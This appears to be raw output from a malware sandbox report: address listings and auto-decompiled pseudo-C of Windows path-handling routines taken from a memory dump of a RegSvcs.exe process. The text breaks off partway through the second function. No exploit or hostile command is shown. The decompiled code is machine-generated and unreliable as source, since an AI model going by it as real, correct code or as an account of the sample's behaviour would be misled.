0x00b15bbe
0x00b15bc4
0x00b15bcd
0x00b15bd3
0x00b15bd6
0x00b15bdc
0x00b15be0
0x00b15be3
0x00b15beb
0x00b15bf2
0x00b15bf8
0x00b15bfe
0x00b15c04
0x00b15c0e
0x00b15c18
0x00b15c1f
0x00b15c25
0x00b15c2a
0x00b15c2c
0x00b15c32
0x00b15c3a
0x00b15c3f
0x00b15c42
0x00b15c48
0x00b15c5b
0x00b15c5b
0x00b15c2c
0x00b15cb7
0x00b15cb9
0x00b15cbf
0x00b15cc2
0x00b15cca
0x00b15ccb
0x00b15ccb
0x00b15cd1
0x00b15cd7
0x00b15cda
0x00b15ce1
0x00b15ce4
0x00b15ce7
0x00b15ced
0x00b15cf3
0x00b15cf9
0x00b15cff
0x00b15d08
0x00b15d0a
0x00b15d0e
0x00b15d10
0x00000000
0x00000000
0x00b15d16
0x00b15d1a
0x00000000
0x00000000
0x00b15d20
0x00b15d22
0x00b15d25
0x00b15d2f
0x00b15d2f
0x00b15d33
0x00b15d3d
0x00b15d49
0x00b15d4b
0x00000000
0x00000000
0x00b15d5a
0x00b15d5d
0x00b15d60
0x00000000
0x00000000
0x00b15d66
0x00b15d69
0x00000000
0x00000000
0x00b15d6f
0x00b15d6f
0x00b15d73
0x00b15d79
0x00b15d7f
0x00b15d86
0x00b15d95
0x00b15d98
0x00b15dba
0x00b15dcb
0x00b15dce
0x00b15dd3
0x00b15dd6
0x00b15dd8
0x00b15de6
0x00b15dec
0x00b15dee
0x00b15df1
0x00b15df3
0x00b1635a
0x00b1635a
0x00000000
0x00b1635a
0x00b15dfe
0x00b15e02
0x00b15e05
0x00b15e07
0x00b15e10
0x00b15e13
0x00b15e1b
0x00b15e1c
0x00b15e21
0x00b15e22
0x00b15e23
0x00b15e25
0x00b15e2a
0x00b15e2c
0x00b15e2e
0x00b15e36
0x00b15e39
0x00b15e42
0x00b15e47
0x00b15e4d
0x00b15e54
0x00b15e54
0x00b15e54
0x00b15e2e
0x00b15e5c
0x00b15e5f
0x00b15e62
0x00b15e64
0x00b15e6b
0x00b15e70
0x00b15e7a
0x00b15e7a
0x00b15e7a
0x00b15e6b
0x00b15e7e
0x00b15e7f
0x00b15e7f
0x00b15e81
0x00b15e87
0x00b15e8b
0x00b15e8c
0x00b15e8c
0x00b15e8c
0x00b15e9a
0x00b15e9c
0x00b15ea2
0x00b15ea6
0x00b15f50
0x00b15f50
0x00b15f57
0x00b15f66
0x00b15f66
0x00b15f66
0x00b15f68
0x00b15f6a
0x00b163d0
0x00000000
0x00b15f70
0x00b15f70
0x00b15f91
0x00b15f9c
0x00b15f9e
0x00b15fa4
0x00b15fa6
0x00b1638c
0x00b16392
0x00b163a1
0x00b163a7
0x00b163af
0x00b163af
0x00b163bd
0x00b163d8
0x00000000
0x00b163d8
0x00b15fac
0x00b15fb2
0x00b15fb4
0x00b15fbd
0x00b15fc6
0x00b15fce
0x00b15fd4
0x00b15fdc
0x00b15fec
0x00b15fed
0x00b15fee
0x00b15fef
0x00b15ff9
0x00b15ffa
0x00b15ffb
0x00b15ffc
0x00b16000
0x00b16004
0x00b16012
0x00b16012
0x00b16018
0x00b16019
0x00b1601a
0x00b1601b
0x00b1601c
0x00b16020
0x00b16059
0x00b1605c
0x00b16061
0x00b16061
0x00b16022
0x00b16022
0x00b16022
0x00b16025
0x00b1602a
0x00b1602b
0x00b16031
0x00b16037
0x00b16038
0x00b1603e
0x00b16048
0x00b16049
0x00b1604a
0x00b1604b
0x00b1604c
0x00b1604d
0x00b16053
0x00b16054
0x00b16054
0x00b16062
0x00b16065
0x00b16067
0x00b1606a
0x00b16070
0x00b16075
0x00b16076
0x00b16081
0x00b16087
0x00b16095
0x00b16099
0x00b1609e
0x00b160a4
0x00b160ae
0x00b160b0
0x00b160b3
0x00b160b6
0x00b160b8
0x00b160ba
0x00b160ba
0x00b160ba
0x00b160ba
0x00b160be
0x00b160c0
0x00b160c5
0x00b160c5
0x00b160c5
0x00b160c6
0x00b160cd
0x00b16114
0x00b160cf
0x00b160cf
0x00b160d4
0x00b160d5
0x00b160da
0x00b160db
0x00b160e1
0x00b160e2
0x00b160e8
0x00b160f8
0x00b160fd
0x00b160fe
0x00b16102
0x00b16104
0x00b16107
0x00b16109
0x00b1610b
0x00b1610b
0x00b1610b
0x00b1610b
0x00b1610f
0x00b1610f
0x00b16117
0x00b1611a
0x00b1611f
0x00b16125
0x00b16134
0x00b16139
0x00b1613f
0x00b16146
0x00b16148
0x00b1614b
0x00b1614d
0x00b1614f
0x00b1614f
0x00b1614f
0x00b1614f
0x00b16153
0x00b16159
0x00b16159
0x00b1615c
0x00b16163
0x00b16169
0x00b1616c
0x00b16172
0x00b16181
0x00b16186
0x00b16187
0x00b1618b
0x00b16191
0x00b16195
0x00b161a3
0x00b161bb
0x00b161c0
0x00b161c3
0x00b161cc
0x00b161d0
0x00b161dc
0x00b161de
0x00b161e1
0x00b161e4
0x00b161e6
0x00b161e8
0x00b161e8
0x00b161e8
0x00b161e8
0x00b161e6
0x00b161ec
0x00b161f3
0x00b16203
0x00b16209
0x00b1620a
0x00b16216
0x00b1621d
0x00b16227
0x00b16241
0x00b16246
0x00b1624c
0x00b16257
0x00b16259
0x00b1625c
0x00b1625e
0x00b16260
0x00b16260
0x00b16260
0x00b16260
0x00b1625e
0x00b16264
0x00b16267
0x00b16269
0x00b16315
0x00b16315
0x00b1631b
0x00b1631e
0x00b16324
0x00b16327
0x00b1632f
0x00b16330
0x00b16333
0x00b1633a
0x00b1633c
0x00b16335
0x00b16335
0x00b16335
0x00b1633f
0x00b16342
0x00b1634c
0x00b16352
0x00b16355
0x00b16355
0x00b16359
0x00000000
0x00b1626f
0x00b16275
0x00b16275
0x00b16278
0x00b1627e
0x00b1627e
0x00b16281
0x00b16287
0x00b1628d
0x00b16298
0x00b1629c
0x00b162a2
0x00b1629e
0x00b1629e
0x00b1629e
0x00b162a7
0x00b162a7
0x00b162aa
0x00b162b0
0x00b162f0
0x00b162f0
0x00b162f2
0x00b162f8
0x00b162fd
0x00b162b2
0x00b162b2
0x00b162b2
0x00b162b5
0x00b162dd
0x00b162e2
0x00b162e5
0x00b162b7
0x00b162b8
0x00b162bb
0x00b162bd
0x00b162c0
0x00b162c4
0x00b162cd
0x00b162cd
0x00b162c0
0x00b162bb
0x00b162b5
0x00b16302
0x00b16303
0x00b16305
0x00b16305
0x00b16305
0x00b1630c
0x00b1630c
0x00000000
0x00b1627e
0x00b16269
0x00b15eac
0x00b15ebb
0x00b15ebe
0x00b15ecb
0x00b15ecb
0x00b15ece
0x00b15ece
0x00b15ed4
0x00b15ed7
0x00b15ed9
0x00b15edb
0x00b15edb
0x00b15ee1
0x00b15ee1
0x00b15ee3
0x00b15f20
0x00b15f20
0x00b15ee5
0x00b15ee5
0x00b15ee5
0x00b15ee8
0x00b15f11
0x00b15f18
0x00b15eea
0x00b15eea
0x00b15eed
0x00b15ef2
0x00b15ef8
0x00b15efb
0x00b15f0a
0x00b15f0a
0x00b15eed
0x00b15ee8
0x00b15f22
0x00b15f28
0x00000000
0x00000000
0x00b15f30
0x00b15f31
0x00b15f37
0x00b15f3a
0x00b15f3d
0x00b15f44
0x00000000
0x00000000
0x00000000
0x00b15f46
0x00b15f48
0x00b15f4d
0x00000000
0x00b15f4d
0x00b15dda
0x00b15ddf
0x00000000
0x00b15ddf
0x00b15dd8
0x00b15da7
0x00b15da9
0x00b15dac
0x00b15dae
0x00000000
0x00b15db4
0x00b15db4
0x00000000
0x00b15db4
0x00b15dae
0x00b15d88
0x00b15d8d
0x00b16363
0x00b16369
0x00b1636a
0x00b16370
0x00b16372
0x00b1637a
0x00b1637b
0x00b1637d
0x00000000
0x00000000
0x00b1637f
0x00b16385
0x00000000
0x00b16385
0x00b15d38
0x00b15d3b
0x00000000
0x00000000
0x00000000
0x00b15d3b
0x00b15d27
0x00b15d29
0x00000000
0x00000000
0x00000000
0x00b16360
0x00000000
0x00b16360
0x00b15c10
0x00b15c10
0x00b163da
0x00b163e5
0x00b163e5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff04634b12587be287cb0ffec802ec3eb7a74293d5954cd0fdc741fd19645c6d
Instruction ID: eacda1825ef2b263902faefa9aec4081d2bd692321ff67788d67da8011255b5f
Opcode Fuzzy Hash: ff04634b12587be287cb0ffec802ec3eb7a74293d5954cd0fdc741fd19645c6d
Instruction Fuzzy Hash: C5423775900629CFDB24CF68C881BA9B7F1FF49304F5481EAD95DAB242E7349A85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A64120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00A64120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xb3d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E00A7F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E00A66E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L00A64620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E00A66E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M00A645F8))) {
												case 0:
													_v568 = 0xa21078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0xa211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L00A64620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E00A8F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E00A8F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00A452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00A5EB70(1, 0xb379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00A5AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00A895D0();
																			L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00A8B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00A83D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00A8B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x00a64128
0x00a64135
0x00a6413c
0x00a64141
0x00a64145
0x00a64147
0x00a6414e
0x00a64151
0x00a64159
0x00a6415c
0x00a64160
0x00a64164
0x00a64168
0x00a6416c
0x00a6417f
0x00a64181
0x00a6446a
0x00a6446a
0x00a6418c
0x00a64195
0x00a64199
0x00a64432
0x00a64439
0x00a6443d
0x00a64442
0x00a64447
0x00000000
0x00a6419f
0x00a641a3
0x00a641b1
0x00a641b9
0x00a641bd
0x00a645db
0x00a645db
0x00000000
0x00a641c3
0x00a641c3
0x00a641ce
0x00a641d4
0x00aae138
0x00aae13e
0x00aae169
0x00aae16d
0x00aae19e
0x00aae16f
0x00aae16f
0x00aae175
0x00aae179
0x00aae18f
0x00aae193
0x00000000
0x00aae199
0x00000000
0x00aae199
0x00aae193
0x00000000
0x00000000
0x00000000
0x00a641da
0x00a641da
0x00a641df
0x00a641e4
0x00a641ec
0x00a64203
0x00a64207
0x00aae1fd
0x00a64222
0x00a64226
0x00aae1f3
0x00aae1f3
0x00a6422c
0x00a6422c
0x00a64233
0x00aae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a64239
0x00a64239
0x00a64239
0x00a64239
0x00a64233
0x00a64226
0x00a641ee
0x00a641ee
0x00a641f4
0x00a64575
0x00aae1b1
0x00aae1b1
0x00000000
0x00a6457b
0x00a6457b
0x00a64582
0x00aae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00a64588
0x00a64588
0x00a6458c
0x00aae1c4
0x00aae1c4
0x00000000
0x00a64592
0x00a64592
0x00a64599
0x00aae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x00a6459f
0x00a6459f
0x00a645a3
0x00aae1d7
0x00aae1e4
0x00000000
0x00a645a9
0x00a645a9
0x00a645b0
0x00aae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00a645b6
0x00a645b6
0x00a645b6
0x00000000
0x00a645b6
0x00a645b0
0x00a645a3
0x00a64599
0x00a6458c
0x00a64582
0x00000000
0x00000000
0x00000000
0x00000000
0x00a641f4
0x00a6423e
0x00a64241
0x00a645c0
0x00a645c4
0x00000000
0x00a645ca
0x00a645ca
0x00000000
0x00aae207
0x00aae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x00a645d1
0x00000000
0x00000000
0x00a645ca
0x00000000
0x00a64247
0x00a64247
0x00a64247
0x00a64249
0x00a64249
0x00a64249
0x00a64251
0x00a64251
0x00a64257
0x00a6425f
0x00a6426e
0x00a64270
0x00a6427a
0x00aae219
0x00aae219
0x00a64280
0x00a64282
0x00a64456
0x00a645ea
0x00000000
0x00a645f0
0x00aae223
0x00000000
0x00aae223
0x00a6445c
0x00a6445c
0x00000000
0x00a6445c
0x00000000
0x00a64288
0x00a6428c
0x00aae298
0x00a64292
0x00a64292
0x00a6429e
0x00a642a3
0x00a642a7
0x00a642ac
0x00aae22d
0x00a642b2
0x00a642b2
0x00a642b9
0x00a642bc
0x00a642c2
0x00a642ca
0x00a642cd
0x00a642cd
0x00a642d4
0x00a6433f
0x00a6433f
0x00a642d6
0x00a642d6
0x00a642d9
0x00a642dd
0x00a642eb
0x00aae23a
0x00a642f1
0x00a64305
0x00a6430d
0x00a64315
0x00a64318
0x00a6431f
0x00a64322
0x00a6432e
0x00a6433b
0x00a6433b
0x00000000
0x00a6432e
0x00a642eb
0x00a6434c
0x00a6434e
0x00a64352
0x00a64359
0x00a6435e
0x00a64361
0x00a6436e
0x00a6438a
0x00a6438e
0x00a64396
0x00a6439e
0x00a643a1
0x00a643ad
0x00a643bb
0x00a643bb
0x00a643ad
0x00a6436e
0x00a643bf
0x00a643c5
0x00a64463
0x00a64463
0x00a643ce
0x00a643d5
0x00a643d9
0x00a643df
0x00a64475
0x00a64479
0x00a64491
0x00a64491
0x00a64479
0x00a643e5
0x00a643eb
0x00a643f4
0x00a643f6
0x00a643f9
0x00a643fc
0x00a643ff
0x00a644e8
0x00a644ed
0x00a644f3
0x00aae247
0x00000000
0x00a644f9
0x00a64504
0x00a64508
0x00a6450f
0x00aae269
0x00000000
0x00a64515
0x00a64519
0x00a64531
0x00a64534
0x00a64537
0x00a6453e
0x00a64541
0x00a6454a
0x00aae255
0x00aae255
0x00aae25b
0x00aae25e
0x00aae261
0x00aae261
0x00a64555
0x00a64559
0x00a6455d
0x00aae26d
0x00aae270
0x00aae274
0x00aae27a
0x00aae27d
0x00aae28e
0x00aae28e
0x00a64563
0x00a64563
0x00a64569
0x00a64569
0x00000000
0x00a6455d
0x00a6450f
0x00000000
0x00a644f3
0x00a643ff
0x00a64405
0x00a64405
0x00a64405
0x00a642ac
0x00a6428c
0x00a64282
0x00a64407
0x00a6440d
0x00aae2af
0x00aae2af
0x00a64413
0x00a64413
0x00000000
0x00a641d4
0x00000000
0x00a641c3
0x00a641bd
0x00a64415
0x00a64415
0x00a64416
0x00a64417
0x00a64429
0x00a6416e
0x00a6416e
0x00a64175
0x00a64498
0x00a6449f
0x00aae12d
0x00000000
0x00aae133
0x00000000
0x00aae133
0x00a644a5
0x00a644a5
0x00a644aa
0x00000000
0x00a644bb
0x00a644ca
0x00a644d6
0x00a644d7
0x00a644d8
0x00a644e3
0x00a644e3
0x00a644aa
0x00a6417b
0x00a6417b
0x00a6417b
0x00000000
0x00a6417b
0x00a64175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48623b4a6dff02bdd09ca03b35e242a53cfcba0a2860783337a473bba758c5c0
Instruction ID: 650222dcf48085884ae126cea5a9d8541219959d63620faafc7620a63541da6d
Opcode Fuzzy Hash: 48623b4a6dff02bdd09ca03b35e242a53cfcba0a2860783337a473bba758c5c0
Instruction Fuzzy Hash: 7AF17A706082118BCB24DF29C495A7AB7F1FF99704F14892EF896CB290E734DC85DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A720A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00A720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xb38714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00A72EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00A72EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00A458EC(_t240);
									_t221 =  *0xb35cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xb35cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
